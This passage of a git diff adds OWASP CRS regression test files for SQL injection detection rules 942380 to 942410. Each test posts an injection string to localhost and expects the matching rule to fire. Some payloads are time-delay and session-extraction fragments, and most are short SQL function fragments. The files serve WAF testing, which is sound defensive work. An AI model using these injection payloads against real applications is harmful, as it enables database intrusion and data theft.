Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-45 + desc: "SQL Injection Attack: EXISTS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log_contains: id "942380" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml new file mode 100644 index 00000000..14fbd480 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942390.yaml +tests: + - test_title: 942390-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=sdfsd%27or%201%20%3e%201" + version: HTTP/1.0 + output: + log_contains: id "942390" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml new file mode 100644 index 00000000..f27782cb --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -0,0 +1,41 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942400.yaml +tests: + - test_title: 942400-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log_contains: id "942400" + - test_title: 942400-2 + desc: "SQL Injection Attack - false positive" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + no_log_contains: id "942400" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml new file mode 100644 index 00000000..088603c0 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -0,0 +1,2013 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942410.yaml +tests: + - test_title: 942410-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ABS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cast(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CAST(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "char(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "chaR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "chr(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CHR(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COALESCE(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Compress (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "concat (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cOnCaT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "concat_ws(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "convert(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "cOnVeRt(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COS(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "COUNT(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "CURRENT_USER(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "database (" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "date(" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=date%5D%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=day.+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=day%26%27%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=decode%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=default%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ELT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=encode%3D%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ExtractValue%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=EXTRACTVALUE%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=floor%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FLOOR+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=format%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-34 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=GROUP_CONCAT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=hex%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=hEx%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if+%21%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=if%5C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IFNULL%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=in+%27%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-43 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IN+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IN%2F%2A%2A%2F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-45 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=insert%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-46 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=left%27%29%3F%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-47 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LEFT%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-48 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-49 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%7C%7C%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-50 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%3F%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-51 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%21%21%21%24%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-52 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=length%26%26%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-53 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=LENGTH%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-54 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-55 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=ln%29+%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-56 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=load_file%28" + version: HTTP/1.0 + output: + log_contains: id "942410" + - test_title: 942410-57 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 